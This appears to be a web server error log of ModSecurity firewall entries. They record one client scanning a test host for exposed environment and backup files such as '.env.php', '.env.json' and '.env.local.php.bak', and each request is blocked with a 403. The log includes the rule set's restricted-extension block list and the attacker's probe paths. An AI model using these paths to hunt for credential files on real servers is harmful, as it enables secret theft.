[Fri Jan 16 03:14:17.335509 2026] [:error] [pid 1444032] [client 45.148.10.246:47228] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.php.bak/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak/"] [unique_id "aWme-ekMvq8uPO2ZciWokAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php.bak/
[Fri Jan 16 03:14:17.335730 2026] [:error] [pid 1444032] [client 45.148.10.246:47228] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak/"] [unique_id "aWme-ekMvq8uPO2ZciWokAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php.bak/
[Fri Jan 16 03:14:17.335887 2026] [:error] [pid 1444032] [client 45.148.10.246:47228] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak/"] [unique_id "aWme-ekMvq8uPO2ZciWokAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php.bak/
[Fri Jan 16 03:14:17.512075 2026] [:error] [pid 1444226] [client 45.148.10.246:47244] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-WcpoCUgeFICb0bc8AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.php.bak
[Fri Jan 16 03:14:17.512225 2026] [:error] [pid 1444226] [client 45.148.10.246:47244] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-WcpoCUgeFICb0bc8AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.php.bak
[Fri Jan 16 03:14:17.512444 2026] [:error] [pid 1444226] [client 45.148.10.246:47244] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-WcpoCUgeFICb0bc8AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.php.bak
[Fri Jan 16 03:14:17.512591 2026] [:error] [pid 1444226] [client 45.148.10.246:47244] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-WcpoCUgeFICb0bc8AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.php.bak
[Fri Jan 16 03:14:17.642919 2026] [:error] [pid 1444031] [client 45.148.10.246:47258] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-X-9MmrgwjmYTAJQdAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.php.bak
[Fri Jan 16 03:14:17.643060 2026] [:error] [pid 1444031] [client 45.148.10.246:47258] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-X-9MmrgwjmYTAJQdAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.php.bak
[Fri Jan 16 03:14:17.643286 2026] [:error] [pid 1444031] [client 45.148.10.246:47258] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-X-9MmrgwjmYTAJQdAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.php.bak
[Fri Jan 16 03:14:17.643441 2026] [:error] [pid 1444031] [client 45.148.10.246:47258] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-X-9MmrgwjmYTAJQdAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.php.bak
[Fri Jan 16 03:14:17.804908 2026] [:error] [pid 1444033] [client 45.148.10.246:47270] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aWme-dLJkp65ULFQ2YYgnQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.php
[Fri Jan 16 03:14:17.805128 2026] [:error] [pid 1444033] [client 45.148.10.246:47270] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aWme-dLJkp65ULFQ2YYgnQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.php
[Fri Jan 16 03:14:17.805284 2026] [:error] [pid 1444033] [client 45.148.10.246:47270] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aWme-dLJkp65ULFQ2YYgnQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.php
[Fri Jan 16 03:14:18.256994 2026] [:error] [pid 1444035] [client 45.148.10.246:47284] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aWme-rauW6yeGWXfDeFWUwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.php
[Fri Jan 16 03:14:18.257226 2026] [:error] [pid 1444035] [client 45.148.10.246:47284] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aWme-rauW6yeGWXfDeFWUwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.php
[Fri Jan 16 03:14:18.257386 2026] [:error] [pid 1444035] [client 45.148.10.246:47284] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aWme-rauW6yeGWXfDeFWUwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.php
[Fri Jan 16 03:14:19.896708 2026] [:error] [pid 1444031] [client 45.148.10.246:48590] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWme-3-9MmrgwjmYTAJQdgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.json
[Fri Jan 16 03:14:19.896940 2026] [:error] [pid 1444031] [client 45.148.10.246:48590] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWme-3-9MmrgwjmYTAJQdgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.json
[Fri Jan 16 03:14:19.897110 2026] [:error] [pid 1444031] [client 45.148.10.246:48590] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWme-3-9MmrgwjmYTAJQdgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.json
[Fri Jan 16 03:14:20.046167 2026] [:error] [pid 1444033] [client 45.148.10.246:48592] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json/"] [unique_id "aWme_NLJkp65ULFQ2YYgnwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.json/
[Fri Jan 16 03:14:20.046446 2026] [:error] [pid 1444033] [client 45.148.10.246:48592] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json/"] [unique_id "aWme_NLJkp65ULFQ2YYgnwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.json/
[Fri Jan 16 03:14:20.046622 2026] [:error] [pid 1444033] [client 45.148.10.246:48592] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json/"] [unique_id "aWme_NLJkp65ULFQ2YYgnwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.json/
[Fri Jan 16 03:14:20.194907 2026] [:error] [pid 1444034] [client 45.148.10.246:48594] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWme_ORfEYyDES-ZFL4gkwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.json
[Fri Jan 16 03:14:20.195128 2026] [:error] [pid 1444034] [client 45.148.10.246:48594] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWme_ORfEYyDES-ZFL4gkwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.json
[Fri Jan 16 03:14:20.195291 2026] [:error] [pid 1444034] [client 45.148.10.246:48594] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWme_ORfEYyDES-ZFL4gkwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.json
[Fri Jan 16 03:14:20.361522 2026] [:error] [pid 1444035] [client 45.148.10.246:48602] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWme_LauW6yeGWXfDeFWVQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.json
[Fri Jan 16 03:14:20.361761 2026] [:error] [pid 1444035] [client 45.148.10.246:48602] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWme_LauW6yeGWXfDeFWVQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.json
[Fri Jan 16 03:14:20.361922 2026] [:error] [pid 1444035] [client 45.148.10.246:48602] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWme_LauW6yeGWXfDeFWVQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.json
[Fri Jan 16 03:14:21.766160 2026] [:error] [pid 1444226] [client 45.148.10.246:48670] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml"] [unique_id "aWme_WcpoCUgeFICb0bc9AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.yml
[Fri Jan 16 03:14:21.766414 2026] [:error] [pid 1444226] [client 45.148.10.246:48670] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml"] [unique_id "aWme_WcpoCUgeFICb0bc9AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.yml
[Fri Jan 16 03:14:21.766597 2026] [:error] [pid 1444226] [client 45.148.10.246:48670] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml"] [unique_id "aWme_WcpoCUgeFICb0bc9AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.yml
[Fri Jan 16 03:14:21.871346 2026] [:error] [pid 1444031] [client 45.148.10.246:48676] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml/"] [unique_id "aWme_X-9MmrgwjmYTAJQeAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.yml/
[Fri Jan 16 03:14:21.871578 2026] [:error] [pid 1444031] [client 45.148.10.246:48676] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml/"] [unique_id "aWme_X-9MmrgwjmYTAJQeAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.yml/
[Fri Jan 16 03:14:21.871739 2026] [:error] [pid 1444031] [client 45.148.10.246:48676] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml/"] [unique_id "aWme_X-9MmrgwjmYTAJQeAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.yml/
